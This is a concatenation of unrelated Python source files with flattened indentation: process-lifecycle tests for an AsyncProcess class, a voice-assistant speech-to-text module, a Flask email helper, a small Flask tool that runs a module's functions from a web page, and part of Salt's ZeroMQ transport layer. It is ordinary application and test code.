t1 = time()
await proc.join(timeout=30)
dt = time() - t1
assert dt <= 1.0
assert not proc.is_alive()
assert proc.pid is not None
assert proc.exitcode == 0
# join() again
t1 = time()
await proc.join()
dt = time() - t1
assert dt <= 0.6
del proc
gc.collect()
start = time()
while wr1() is not None and time() < start + 1:
# Perhaps the GIL switched before _watch_process() exit,
# help it a little
sleep(0.001)
gc.collect()
if wr1() is not None:
# Help diagnosing
from types import FrameType
p = wr1()
if p is not None:
rc = sys.getrefcount(p)
refs = gc.get_referrers(p)
del p
print("refs to proc:", rc, refs)
frames = [r for r in refs if isinstance(r, FrameType)]
for i, f in enumerate(frames):
print(
"frames #%d:" % i,
f.f_code.co_name,
f.f_code.co_filename,
sorted(f.f_locals),
)
pytest.fail("AsyncProcess should have been destroyed")
t1 = time()
while wr2() is not None:
await asyncio.sleep(0.01)
gc.collect()
dt = time() - t1
assert dt < 2.0
@gen_test()
async def test_exitcode():
q = mp_context.Queue()
proc = AsyncProcess(target=exit, kwargs={"q": q})
proc.daemon = True
assert not proc.is_alive()
assert proc.exitcode is None
await proc.start()
assert proc.is_alive()
assert proc.exitcode is None
q.put(5)
await proc.join(timeout=30)
assert not proc.is_alive()
assert proc.exitcode == 5
@pytest.mark.skipif(WINDOWS, reason="POSIX only")
@gen_test()
async def test_signal():
proc = AsyncProcess(target=exit_with_signal, args=(signal.SIGINT,))
proc.daemon = True
assert not proc.is_alive()
assert proc.exitcode is None
await proc.start()
await proc.join(timeout=30)
assert not proc.is_alive()
# Can be 255 with forkserver, see https://bugs.python.org/issue30589
assert proc.exitcode in (-signal.SIGINT, 255)
proc = AsyncProcess(target=wait)
await proc.start()
os.kill(proc.pid, signal.SIGTERM)
await proc.join(timeout=30)
assert not proc.is_alive()
assert proc.exitcode in (-signal.SIGTERM, 255)
@gen_test()
async def test_terminate():
proc = AsyncProcess(target=wait)
proc.daemon = True
await proc.start()
await proc.terminate()
await proc.join(timeout=30)
assert not proc.is_alive()
assert proc.exitcode in (-signal.SIGTERM, 255)
@gen_test()
async def test_close():
proc = AsyncProcess(target=exit_now)
proc.close()
with pytest.raises(ValueError):
await proc.start()
proc = AsyncProcess(target=exit_now)
await proc.start()
proc.close()
with pytest.raises(ValueError):
await proc.terminate()
proc = AsyncProcess(target=exit_now)
await proc.start()
await proc.join()
proc.close()
with pytest.raises(ValueError):
await proc.join()
proc.close()
@gen_test()
async def test_exit_callback():
to_child = mp_context.Queue()
from_child = mp_context.Queue()
evt = Event()
# FIXME: this breaks if changed to async def...
@gen.coroutine
def on_stop(_proc):
assert _proc is proc
yield gen.moment
evt.set()
# Normal process exit
proc = AsyncProcess(target=feed, args=(to_child, from_child))
evt.clear()
proc.set_exit_callback(on_stop)
proc.daemon = True
await proc.start()
await asyncio.sleep(0.05)
assert proc.is_alive()
assert not evt.is_set()
to_child.put(None)
await evt.wait(timedelta(seconds=3))
assert evt.is_set()
assert not proc.is_alive()
# Process terminated
proc = AsyncProcess(target=wait)
evt.clear()
proc.set_exit_callback(on_stop)
proc.daemon = True
await proc.start()
await asyncio.sleep(0.05)
assert proc.is_alive()
assert not evt.is_set()
await proc.terminate()
await evt.wait(timedelta(seconds=3))
assert evt.is_set()
@gen_test()
async def test_child_main_thread():
"""
The main thread in the child should be called "MainThread".
"""
q = mp_context.Queue()
proc = AsyncProcess(target=threads_info, args=(q,))
await proc.start()
await proc.join()
n_threads = q.get()
main_name = q.get()
assert n_threads <= 3
assert main_name == "MainThread"
q.close()
q._reader.close()
q._writer.close()
@pytest.mark.skipif(
sys.platform.startswith("win"), reason="num_fds not supported on windows"
)
@gen_test()
async def test_num_fds():
psutil = pytest.importorskip("psutil")
# Warm up
proc = AsyncProcess(target=exit_now)
proc.daemon = True
await proc.start()
await proc.join()
p = psutil.Process()
before = p.num_fds()
proc = AsyncProcess(target=exit_now)
proc.daemon = True
await proc.start()
await proc.join()
assert not proc.is_alive()
assert proc.exitcode == 0
start = time()
while p.num_fds() > before:
await asyncio.sleep(0.1)
print("fds:", before, p.num_fds())
assert time() < start + 10
@gen_test()
async def test_terminate_after_stop():
proc = AsyncProcess(target=sleep, args=(0,))
await proc.start()
await asyncio.sleep(0.1)
await proc.terminate()
def _worker_process(worker_ready, child_pipe):
# child_pipe is the write-side of the children_alive pipe held by the
# test process. When this _worker_process exits, this file descriptor should
# have no references remaining anywhere and be closed by the kernel. The
# test will therefore be able to tell that this process has exited by
# reading children_alive.
# Signal to parent process that this process has started and made it this
# far. This should cause the parent to exit rapidly after this statement.
worker_ready.set()
# The parent exiting should cause this process to os._exit from a monitor
# thread. This sleep should never return.
shorter_timeout = 2.5 # timeout shorter than that in the spawning test.
sleep(shorter_timeout)
# Unreachable if functioning correctly.
child_pipe.send("child should have exited by now")
def _parent_process(child_pipe):
"""Simulate starting an AsyncProcess and then dying.
The child_alive pipe is held open for as long as the child is alive, and can
be used to determine if it exited correctly."""
async def parent_process_coroutine():
worker_ready = mp_context.Event()
worker = AsyncProcess(target=_worker_process, args=(worker_ready, child_pipe))
await worker.start()
# Wait for the child process to have started.
worker_ready.wait()
# Exit immediately, without doing any process teardown (including atexit
# and 'finally:' blocks) as if by SIGKILL. This should cause
# worker_process to also exit.
os._exit(255)
with pristine_loop() as loop:
try:
loop.run_sync(parent_process_coroutine, timeout=10)
finally:
loop.stop()
raise RuntimeError("this should be unreachable due to os._exit")
def test_asyncprocess_child_teardown_on_parent_exit():
r"""Check that a child process started by AsyncProcess exits if its parent
exits.
The motivation is to ensure that if an AsyncProcess is created and the
creator process dies unexpectedly (e.g, via Out-of-memory SIGKILL), the
child process and resources held by it should not be leaked.
The child should monitor its parent and exit promptly if the parent exits.
[test process] -> [parent using AsyncProcess (dies)] -> [worker process]
\ /
\________ <-- child_pipe <-- ________/
"""
# When child_pipe is closed, the children_alive pipe unblocks.
children_alive, child_pipe = mp_context.Pipe(duplex=False)
try:
parent = mp_context.Process(target=_parent_process, args=(child_pipe,))
parent.start()
# Close our reference to child_pipe so that the child has the only one.
child_pipe.close()
# Wait for the parent to exit. By the time join returns, the child
# process is orphaned, and should be in the process of exiting by
# itself.
parent.join()
# By the time we reach here, the parent has exited. The parent only exits
# when the child is ready to enter the sleep, so all of the slow things
# (process startup, etc) should have happened by now, even on a busy
# system. A short timeout should therefore be appropriate.
short_timeout = 5.0
# Poll is used to allow other tests to proceed after this one in case of
# test failure.
try:
readable = children_alive.poll(short_timeout)
except BrokenPipeError:
assert sys.platform.startswith("win"), "should only raise on windows"
# Broken pipe implies closed, which is readable.
readable = True
# If this assert fires, then something went wrong. Either the child
# should write into the pipe, or it should exit and the pipe should be
# closed (which makes it become readable).
assert readable
try:
# This won't block due to the above 'assert readable'.
result = children_alive.recv()
except EOFError:
pass # Test passes.
except BrokenPipeError:
assert sys.platform.startswith("win"), "should only raise on windows"
# Test passes.
else:
# Oops, children_alive read something. It should be closed. If
# something was read, it's a message from the child telling us they
# are still alive!
raise RuntimeError(f"unreachable: {result}")
finally:
# Cleanup.
children_alive.close()
|
stt.py
|
"""
**Speech to Text (STT) engine**
Converts the user speech (audio) into text.
"""
import threading
import traceback
import speech_recognition as sr
from src import settings
from src.core.modules import log, tts, replying
def setup() -> None:
"""
Initializes the STT engine
Steps:
1. Creates a new `Recognizer` object
2. Configures the energy threshold
"""
global recognizer
recognizer = sr.Recognizer()
recognizer.dynamic_energy_threshold = False
recognizer.energy_threshold = settings.SR_ENERGY_THRESHOLD
def listen() -> sr.AudioData:
"""
Listens for user input (voice) and returns it
Returns:
sr.AudioData: The raw input data
"""
with sr.Microphone() as raw_microphone_input:
log.debug("Listening to ambient...")
audio = recognizer.listen(raw_microphone_input)
return audio
def recognize(audio: sr.AudioData) -> str:
"""
Transcribes human voice data from an `AudioData` object (from `listen`)
Args:
audio (sr.AudioData): The raw audio data from the user
Returns:
str: A sentence/phrase with the user intent
"""
output = None
log.debug("Recognizing audio...")
if settings.STT_ENGINE == "google":
try:
output = recognizer.recognize_google(audio, language=settings.LANGUAGE)
except sr.UnknownValueError:
log.debug("Speech engine could not resolve audio")
except sr.RequestError:
log.error("An error ocurred with the Google services, try again")
except Exception:
traceback.print_exc()
log.error("An unknown error occurred...")
finally:
return output
def recognize_keyword() -> None:
"""
Listens for the keyword, to activate the assistant.
Steps:
1. Listens for audio from the microphone
2. Recognizes the audio using the Google Speech Recognition API
3. Checks if the keyword (as in `settings.KEYWORD`) is in the audio data (if True, break loop)
"""
global keyword_detected
global new_process
audio = listen()
new_process = True
log.debug("Recognizing keyword...")
try:
rec_input = recognizer.recognize_google(audio, language=settings.LANGUAGE)
if settings.KEYWORD in rec_input.lower():
log.debug("Keyword detected!")
# stop listening
keyword_detected = True
else:
log.debug("Keyword not detected in '{0}'".format(rec_input))
except sr.UnknownValueError:
log.debug("Speech engine could not resolve audio")
except sr.RequestError:
log.error("An error ocurred with the Google services, try again")
except Exception:
traceback.print_exc()
log.error("An unknown error occurred...")
def listen_for_keyword() -> bool:
"""
Loops until the keyword is recognized from the user input (from `recognize_keyword`).
Steps:
1. Enters the loop (keyword detection)
2. Creates a new thread (using `recognize_keyword` as target)
3. If the keyword is detected, break the loop and play the activation sound
Returns:
bool: Whether the keyword was recognized or not. If not, the loop continues.
"""
global keyword_detected
global new_process
log.debug("Keyword loop...")
keyword_detected = False
new_process = True
log.info("Waiting for '{0}'...".format(settings.KEYWORD))
while True:
if keyword_detected:
break
if new_process:
new_process = False
threading.Thread(target=recognize_keyword).start()
tts.play_mp3(settings.ACTIVATION_SOUND_PATH)
return True
def listen_for_binary() -> bool:
"""
Checks if a binary/boolean value (Yes/No) is present in the transcribed audio.
Used in Yes/No questions (e.g. *"Do you want X?"*)
Steps:
1. Listens for audio from the microphone
2. Recognizes the audio using the Google Speech Recognition API
3. Checks if a boolean value (Yes, No, True, False) is present in the audio data
Returns:
bool: Whether a boolean value is present in the audio data
"""
yes_reply = replying.get_reply(["stt", "yn_y"], system=True, module=True)
no_reply = replying.get_reply(["stt", "yn_n"], system=True, module=True)
log.info("Waiting for {0} or {1}".format(yes_reply, no_reply))
while True:
audio = listen()
rec_input = recognize(audio)
if rec_input:
if yes_reply in rec_input.lower():
log.debug("'{0}' detected".format(yes_reply))
return True
elif no_reply in rec_input.lower():
log.debug("'{0}' detected".format(no_reply))
return False
else:
log.debug("Not detected binary answer in {0}".format(rec_input))
|
email.py
|
from flask import render_template
from flask_mail import Message
from flask_babel import _
from threading import Thread
from app import app, mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email(_('[Microblog] Reset Your Password'),
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token))
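# Illustrative usage sketch: a hypothetical call showing the arguments that
# send_email() expects. It assumes the Flask app above is fully configured for
# Flask-Mail (mail server, credentials, ADMINS), and only runs when this
# module is executed directly.
if __name__ == "__main__":
    send_email(
        subject="[Microblog] Hello",
        sender=app.config['ADMINS'][0],
        recipients=["user@example.com"],  # hypothetical recipient
        text_body="plain-text body",
        html_body="<p>HTML body</p>",
    )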
|
touch_callable.py
|
#!/usr/bin/env python3
import argparse
import datetime
import enum
import importlib.util
import inspect
import os
import logging
import urllib.parse
import pytz
import sys
import typing
import json
import time
import io
from flask import Flask, jsonify, request, send_file, send_from_directory
app = Flask(__name__)
CALLABLES = None
HAS_NEW_MODULE = False
MODULE_PATH = None
LOCALE = "en"
KEEP_WATCHING = True
@app.route("/")
def home():
return send_file("./front-end/build/index.html")
@app.route("/static/css/<path:filename>")
def serve_css(filename):
return send_from_directory("./front-end/build/static/css/", filename)
@app.route("/static/js/<path:filename>")
def serve_js(filename):
return send_from_directory("./front-end/build/static/js/", filename)
@app.route("/manifest.json")
def serve_manifest():
return send_file("./front-end/build/manifest.json")
@app.route("/favicon.ico")
def serve_favicon():
return send_file("./front-end/build/favicon.ico")
@app.route("/logo192.png")
def serve_logo192():
return send_file("./front-end/build/logo192.png")
@app.route("/logo512.png")
def serve_logo512():
return send_file("./front-end/build/logo512.png")
def get_callable_from_module(module):
def annotation_name_or_none(annotation):
if annotation != inspect._empty:
return annotation.__name__
def get_parameter_annotation(annotation):
if issubclass(annotation, enum.Enum):
return "Enum"
return annotation_name_or_none(annotation)
def get_default_value(default):
if default == inspect._empty:
return None
if isinstance(default, enum.Enum):
return default.value
if isinstance(default, (datetime.date, datetime.datetime)):
return default.isoformat()
if isinstance(default, datetime.time):
return default.replace(microsecond=0).isoformat()
return default
def is_support_signature(signature):
for parameter in signature.parameters.values():
if issubclass(parameter.annotation, enum.Enum):
return True
if parameter.annotation not in (
str,
int,
float,
bool,
datetime.datetime,
datetime.date,
datetime.time,
io.BytesIO,
typing.BinaryIO,
):
return False
if parameter.kind in (
inspect.Parameter.VAR_KEYWORD,
inspect.Parameter.VAR_POSITIONAL,
):
return False
return True
def is_required_parameter(parameter):
if parameter.default == inspect._empty:
return True
return False
def get_enum_values(annotation):
if issubclass(annotation, enum.Enum):
return [e.value for e in annotation]
data = []
for callable_name, callable_ in inspect.getmembers(module, inspect.isfunction):
if callable_.__module__ != module.__name__:
continue
full_doc = inspect.getdoc(callable_)
signature = inspect.signature(callable_)
if not is_support_signature(signature):
continue
data.append(
{
"callable_name": callable_name,
"title": full_doc.split()[0] if full_doc else "",
"doc": full_doc,
"source_code": inspect.getsource(callable_),
"return_type": annotation_name_or_none(signature.return_annotation),
"parameters": [
{
"default": get_default_value(parameter.default),
"kind": parameter.kind.name,
"required": is_required_parameter(parameter),
"name": name,
"annotation": get_parameter_annotation(parameter.annotation),
"enum_values": get_enum_values(parameter.annotation),
}
for name, parameter in signature.parameters.items()
],
}
)
return data
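# Illustrative shape of a single entry returned by get_callable_from_module()
# above (the function name and values here are hypothetical):
#   {
#       "callable_name": "greet",
#       "title": "Say",                      # first word of the docstring
#       "doc": "Say hello.",
#       "source_code": "def greet(name: str):\n    ...",
#       "return_type": None,
#       "parameters": [
#           {"default": None, "kind": "POSITIONAL_OR_KEYWORD", "required": True,
#            "name": "name", "annotation": "str", "enum_values": None},
#       ],
#   }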
def is_required(callable_name, param_name):
global CALLABLES
for callable_info in CALLABLES:
if callable_info["callable_name"] == callable_name:
for param_info in callable_info["parameters"]:
if param_info["name"] == param_name:
return param_info["required"]
@app.route("/module-status", methods=["GET"])
def module_status():
global HAS_NEW_MODULE
return {"has_new": HAS_NEW_MODULE}
@app.route("/reload-module", methods=["POST"])
def reload_module():
global MODULE
global MODULE_PATH
global HAS_NEW_MODULE
global CALLABLES
MODULE = load_module_by_path(MODULE_PATH)
HAS_NEW_MODULE = False
CALLABLES = None
return {"status": "ok"}
@app.route("/callable")
def get_callable():
global CALLABLES
if not CALLABLES:
CALLABLES = get_callable_from_module(MODULE)
return jsonify(CALLABLES)
@app.route("/locale", methods=["GET", "POST"])
def get_locale():
global LOCALE
if request.method == "GET":
return {"locale": LOCALE}
else:
LOCALE = request.json["locale"]
return {"locale": LOCALE}
@app.route("/callable/<string:callable_name>", methods=["POST"])
def run_callable(callable_name):
callable_ = getattr(MODULE, callable_name)
type_casted_parameters = {}
if request.form:
data = json.loads(request.form["json"])
for param_name, file in request.files.items():
file_in_bytes_io = file.stream._file
if isinstance(file.stream._file, io.BufferedRandom):
file_in_bytes_io = io.BytesIO()
file_in_bytes_io.write(file.stream._file.read())
file_in_bytes_io.seek(0)
type_casted_parameters[param_name] = file_in_bytes_io
else:
data = request.json
type_hints = typing.get_type_hints(callable_)
for param_name, value in data.items():
type_ = type_hints[param_name]
if value is None:
type_casted_parameters[param_name] = value
continue
if type_ is datetime.datetime:
type_casted_parameters[param_name] = datetime.datetime.strptime(
value, "%Y-%m-%dT%H:%M:%S.%fZ"
).replace(tzinfo=pytz.UTC)
continue
if type_ is datetime.date:
type_casted_parameters[param_name] = datetime.datetime.strptime(
value, "%Y-%m-%dT%H:%M:%S.%fZ"
).date()
continue
if type_ is datetime.time:
type_casted_parameters[param_name] = datetime.datetime.strptime(
value, "%Y-%m-%dT%H:%M:%S.%fZ"
).time()
continue
if type_.__class__ == typing.Union.__class__:
for possible_type in type_.__args__:
if possible_type is not type(None): # noqa: E721
try:
type_casted_parameters[param_name] = possible_type(value)
except: # noqa: E722
pass
continue
type_casted_parameters[param_name] = type_(value)
status = "success"
try:
result = callable_(**type_casted_parameters)
except Exception as e:
status = "fail"
result = str(e)
if isinstance(result, io.BufferedReader):
return send_file(
result,
attachment_filename=urllib.parse.quote(os.path.basename(result.name)),
as_attachment=True,
)
return jsonify({"status": status, "result": result})
def load_module_by_path(path):
abspath = os.path.abspath(path)
if not os.path.exists(abspath):
raise ValueError("Module does not exist!")
sys.path.insert(0, os.getcwd())
module_name = os.path.splitext(os.path.basename(abspath))[0]
spec = importlib.util.spec_from_file_location(module_name, abspath)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
return module
def _iter_module_files():
"""This iterates over all relevant Python files. It goes through all
loaded files from modules, all files in folders of already loaded modules
as well as all files reachable through a package.
"""
global MODULE
# The list call is necessary on Python 3 in case the module
# dictionary is modified during iteration.
for module in list(sys.modules.values()) + [MODULE]:
if module is None:
continue
filename = getattr(module, "__file__", None)
if filename:
if os.path.isdir(filename) and os.path.exists(
os.path.join(filename, "__init__.py")
):
filename = os.path.join(filename, "__init__.py")
old = None
while not os.path.isfile(filename):
old = filename
filename = os.path.dirname(filename)
if filename == old:
break
else:
if filename[-4:] in (".pyc", ".pyo"):
filename = filename[:-1]
yield filename
def watch_module():
global MODULE_PATH, MODULE, HAS_NEW_MODULE
global KEEP_WATCHING
from itertools import chain
mtimes = {}
while KEEP_WATCHING:
for filename in chain(_iter_module_files()):
try:
mtime = os.stat(filename).st_mtime
except OSError:
continue
old_time = mtimes.get(filename)
if old_time is None:
mtimes[filename] = mtime
continue
elif mtime > old_time:
HAS_NEW_MODULE = True
mtimes = {}
time.sleep(1)
def main():
global MODULE, MODULE_PATH, KEEP_WATCHING
parser = argparse.ArgumentParser(description="Touch Callable")
parser.add_argument("module_path", type=str)
parser.add_argument("--host", type=str, default="127.0.0.1")
parser.add_argument("--port", type=int, default=6789)
parser.add_argument("--debug", type=bool, default=False)
args = parser.parse_args()
MODULE_PATH = args.module_path
MODULE = load_module_by_path(args.module_path)
if not args.debug:
werkzeug_logger = logging.getLogger("werkzeug")
werkzeug_logger.setLevel(logging.ERROR)
os.environ["WERKZEUG_RUN_MAIN"] = "true"
import threading
t = threading.Thread(target=watch_module)
t.start()
import click
click.echo(" * touch-callable serving http://{}:{}".format(args.host, args.port))
app.run(host=args.host, debug=args.debug, port=args.port)
KEEP_WATCHING = False
t.join()
if __name__ == "__main__":
main()
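# Illustrative invocation, based on the argparse options defined in main()
# ("my_funcs.py" is a hypothetical module path supplied by the user):
#
#   python touch_callable.py my_funcs.py --host 127.0.0.1 --port 6789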
|
zeromq.py
|
# -*- coding: utf-8 -*-
'''
Zeromq transport classes
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import os
import sys
import copy
import errno
import signal
import socket
import hashlib
import logging
import weakref
import threading
from random import randint
# Import Salt Libs
import salt.auth
import salt.crypt
import salt.log.setup
import salt.utils.event
import salt.utils.files
import salt.utils.minions
import salt.utils.process
import salt.utils.stringutils
import salt.utils.verify
import salt.utils.zeromq
import salt.utils.versions
import salt.payload
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.ext import six
from salt.exceptions import SaltReqTimeoutError, SaltException
from salt._compat import ipaddress
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO, LIBZMQ_VERSION_INFO
import zmq.error
import zmq.eventloop.ioloop
import zmq.eventloop.zmqstream
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# Import Tornado Libs
import salt.ext.tornado
import salt.ext.tornado.ioloop
import salt.ext.tornado.gen
import salt.ext.tornado.concurrent
# Import third party libs
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
log = logging.getLogger(__name__)
def _get_master_uri(master_ip,
master_port,
source_ip=None,
source_port=None):
'''
Return the ZeroMQ URI to connect the Minion to the Master.
It supports different source IP / port, given the ZeroMQ syntax:
// Connecting using a IP address and bind to an IP address
rc = zmq_connect(socket, "tcp://192.168.1.17:5555;192.168.1.1:5555"); assert (rc == 0);
Source: http://api.zeromq.org/4-1:zmq-tcp
'''
from salt.utils.zeromq import ip_bracket
master_uri = 'tcp://{master_ip}:{master_port}'.format(
master_ip=ip_bracket(master_ip), master_port=master_port)
if source_ip or source_port:
if LIBZMQ_VERSION_INFO >= (4, 1, 6) and ZMQ_VERSION_INFO >= (16, 0, 1):
# The source:port syntax for ZeroMQ has been added in libzmq 4.1.6
# which is included in the pyzmq wheels starting with 16.0.1.
if source_ip and source_port:
master_uri = 'tcp://{source_ip}:{source_port};{master_ip}:{master_port}'.format(
source_ip=ip_bracket(source_ip), source_port=source_port,
master_ip=ip_bracket(master_ip), master_port=master_port)
elif source_ip and not source_port:
master_uri = 'tcp://{source_ip}:0;{master_ip}:{master_port}'.format(
source_ip=ip_bracket(source_ip),
master_ip=ip_bracket(master_ip), master_port=master_port)
elif source_port and not source_ip:
ip_any = '0.0.0.0' if ipaddress.ip_address(master_ip).version == 4 else ip_bracket('::')
master_uri = 'tcp://{ip_any}:{source_port};{master_ip}:{master_port}'.format(
ip_any=ip_any, source_port=source_port,
master_ip=ip_bracket(master_ip), master_port=master_port)
else:
log.warning('Unable to connect to the Master using a specific source IP / port')
log.warning('Consider upgrading to pyzmq >= 16.0.1 and libzmq >= 4.1.6')
log.warning('Specific source IP / port for connecting to master returner port: configuration ignored')
return master_uri
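# Illustrative return values for _get_master_uri() above (addresses are
# hypothetical):
#   _get_master_uri('203.0.113.5', 4506)
#       -> 'tcp://203.0.113.5:4506'
#   _get_master_uri('203.0.113.5', 4506, source_ip='10.0.0.7', source_port=4515)
#       -> 'tcp://10.0.0.7:4515;203.0.113.5:4506'  (with libzmq >= 4.1.6 and pyzmq >= 16.0.1)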
class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to ZeroMQ.
ZMQ Channels default to 'crypt=aes'
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop')
if io_loop is None:
install_zmq()
io_loop = ZMQDefaultLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug('Initializing new AsyncZeroMQReqChannel for %s', key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
obj._instance_key = key
loop_instance_map[key] = obj
obj._refcount = 1
obj._refcount_lock = threading.RLock()
log.trace('Inserted key into loop_instance_map id %s for key %s and process %s',
id(loop_instance_map), key, os.getpid())
else:
with obj._refcount_lock:
obj._refcount += 1
log.debug('Re-using AsyncZeroMQReqChannel for %s', key)
return obj
def __deepcopy__(self, memo):
cls = self.__class__
result = cls.__new__(cls, copy.deepcopy(self.opts, memo)) # pylint: disable=too-many-function-args
memo[id(self)] = result
for key in self.__dict__:
if key in ('_io_loop', '_refcount', '_refcount_lock'):
continue
# The _io_loop has a thread Lock which will fail to be deep
# copied. Skip it because it will just be recreated on the
# new copy.
if key == 'message_client':
# Recreate the message client because it will fail to be deep
# copied. The reason is the same as the io_loop skip above.
setattr(result, key,
AsyncReqMessageClientPool(result.opts,
args=(result.opts, self.master_uri,),
kwargs={'io_loop': self._io_loop}))
continue
setattr(result, key, copy.deepcopy(self.__dict__[key], memo))
return result
@classmethod
def __key(cls, opts, **kwargs):
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
kwargs.get('master_uri', opts.get('master_uri')), # master ID
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.ttype = 'zeromq'
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
if 'master_uri' in kwargs:
self.opts['master_uri'] = kwargs['master_uri']
self._io_loop = kwargs.get('io_loop')
if self._io_loop is None:
install_zmq()
self._io_loop = ZMQDefaultLoop.current()
if self.crypt != 'clear':
# we don't need to worry about auth as a kwarg, since it's a singleton
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
log.debug('Connecting the Minion to the Master URI (for the return server): %s', self.master_uri)
self.message_client = AsyncReqMessageClientPool(self.opts,
args=(self.opts, self.master_uri,),
kwargs={'io_loop': self._io_loop})
self._closing = False
@classmethod
def force_close_all_instances(cls):
"""
Will force close all instances
ZMQ can hang on quit if left to deconstruct on its own.
This is because it deconstructs out of order.
:return: None
"""
for weak_dict in list(cls.instance_map.values()):
for instance in list(weak_dict.values()):
instance.close()
def close(self):
'''
Since the message_client creates sockets and assigns them to the IOLoop we have to
specifically destroy them, since we aren't the only ones with references to the FDs
'''
if self._closing:
return
if self._refcount > 1:
# Decrease refcount
with self._refcount_lock:
self._refcount -= 1
log.debug(
'This is not the last %s instance. Not closing yet.',
self.__class__.__name__
)
return
log.debug('Closing %s instance', self.__class__.__name__)
self._closing = True
if hasattr(self, 'message_client'):
self.message_client.close()
# Remove the entry from the instance map so that a closed entry may not
# be reused.
# This forces this operation even if the reference count of the entry
# has not yet gone to zero.
if self._io_loop in self.__class__.instance_map:
loop_instance_map = self.__class__.instance_map[self._io_loop]
if self._instance_key in loop_instance_map:
del loop_instance_map[self._instance_key]
if not loop_instance_map:
del self.__class__.instance_map[self._io_loop]
# pylint: disable=W1701
def __del__(self):
with self._refcount_lock:
# Make sure we actually close no matter if something
# went wrong with our ref counting
self._refcount = 1
try:
self.close()
except socket.error as exc:
if exc.errno != errno.EBADF:
# If it's not a bad file descriptor error, raise
raise
# pylint: enable=W1701
@property
def master_uri(self):
if 'master_uri' in self.opts:
return self.opts['master_uri']
# if by chance master_uri is not there..
if 'master_ip' in self.opts:
return _get_master_uri(self.opts['master_ip'],
self.opts['master_port'],
source_ip=self.opts.get('source_ip'),
source_port=self.opts.get('source_ret_port'))
# if we've reached here something is very abnormal
raise SaltException('ReqChannel: missing master_uri/master_ip in self.opts')
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@salt.ext.tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
# Return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
# Return control to the caller. When send() completes, resume by populating ret with the Future.result
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
key = self.auth.get_keys()
if 'key' not in ret:
# Reauth in the case our key is deleted on the master side.
yield self.auth.authenticate()
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
if HAS_M2:
aes = key.private_decrypt(ret['key'],
RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
@salt.ext.tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60, raw=False):
'''
Send a load across the wire, with encryption
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
'''
@salt.ext.tornado.gen.coroutine
def _do_transfer():
# Yield control to the caller. When send() completes, resume by populating data with the Future.result
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
# we may not always have data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data, raw)
if six.PY3 and not raw:
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
if not self.auth.authenticated:
# Return control back to the caller, resume when authentication succeeds
yield self.auth.authenticate()
try:
# We did not get data back the first time. Retry.
ret = yield _do_transfer()
except salt.crypt.AuthenticationError:
# If auth error, return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire in cleartext
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
'''
ret = yield self.message_client.send(
self._package_load(load),
timeout=timeout,
tries=tries,
)
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
'''
